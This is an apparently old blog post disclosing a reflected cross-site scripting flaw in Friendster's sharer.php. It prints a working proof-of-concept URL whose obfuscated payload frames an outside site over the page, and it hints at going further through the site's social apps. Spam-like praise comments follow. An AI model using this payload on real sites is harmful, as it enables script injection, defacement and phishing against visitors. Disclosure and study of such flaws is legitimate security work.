Categories Tree

Tags

Recent Posts

Recent Comments

May 16, 2010

XSS On Friendster

Posted by: Joy  :  Category: Vulnerability
Bookmark and Share
Friendster XSSRecently, many friendster users leave and move to facebook. That’s probably because facebook provides more easyness and interactivity than friendster, many cool games, chat, usefull applications, etc. Friendster seems to follow facebook too now, they tried to add anything facebook has on their page. They even tried to provide us chat facility like the one on facebook, but it has not been implemented yet untill now. There are some more things that friendster try to follow, you can see how their activity stream, also link sharer, etc.

OK, let’s go straight to the topic, i accidentally found another XSS vulnerability “again” on their file, named sharer.php. It doesnt sanitize parameter correctly.

ScreenShot :
XSS On Friendster

POC :
http://www.friendster.com/sharer.php?u=http%3A%2F%2Fcrazydavinci.net%2F%22 target=%22_blank%22%20style=%22background:black url%28http://crazydavinci.info/komen/komen29.jpg%29;color:black; z-index:666666;position:absolute;top:0;left:0;width:6666px;height:6666px%22 onmouseover=%22alert%28%27XSSed%20By%20CrazyDaVinci%27%29 location=%27javascript:document.write%28String.fromCharCode%2860,116, 105,116,108,101,62,70,114,105,101,110,100,115,116,101,114,32,124,32,88,83,83, 101,100,32,66,121,32,67,114,97,122,121,68,97,86,105,110,99,105,60,47,116,105, 116,108,101,62,13,10,60,102,114,97,109,101,115,101,116,32,114,111,119,115,61, 34,49,48,48,37,44,42,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,78, 79,34,32,98,111,114,100,101,114,61,34,48,34,32,102,114,97,109,101,115,112,97, 99,105,110,103,61,34,48,34,62,60,102,114,97,109,101,32,115,114,99,61,34,104, 116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101, 116,47,34,62,60,47,102,114,97,109,101,115,101,116,62%29%29; document.close%28%29;void%280%29%27&t=%A0

This one is client side though, meaning that it only affects viewers browser, not saved on the original page. If you want to go further, you can develop a Friendster Open Social Apps and manipulate the vulnerabilty on the style tag, you can make JS and CSS linker for Internet Explorer with it. Use your imagination, i’m not gonna tell you the details here. Actually, there are some more vulnerable page and apps on friendster that can be used as a CrossBrowser Linker and has not been filtered yet untill now, but i wont share it here. This is posted only to prove that anything can be vulnerable even for big sites like friendster, facebook, or even google, etc.

3 Responses to “XSS On Friendster”

  1. 1
    Wear Says:
    May 16th, 2010 at 5:05 PM

    Thank you for this very nice post, I was searching this very same topic for a research paper for school and I am so glad I found this, It has helped me so much.

  2. 2
    Pausleal Says:
    May 17th, 2010 at 1:36 PM

    Keep posting stuff like this i really like it

  3. 3
    Effisyhix Says:
    May 19th, 2010 at 12:05 PM

    Just want to say what a great blog you got here!
    I’ve been around for quite a lot of time, but finally decided to show my appreciation of your work!

    Thumbs up, and keep it going!

    Cheers
    Christian

Leave a Reply

Narsis Corner

    skull

    SEO Monitor
    SEO Stats
    :: Special Links ::
    Komunitas BSI
    :: Link Me Back ::
    = With Image =
    !CrazyDavinci!

    = Link Only =

Media-Box

Chat-Box

Archives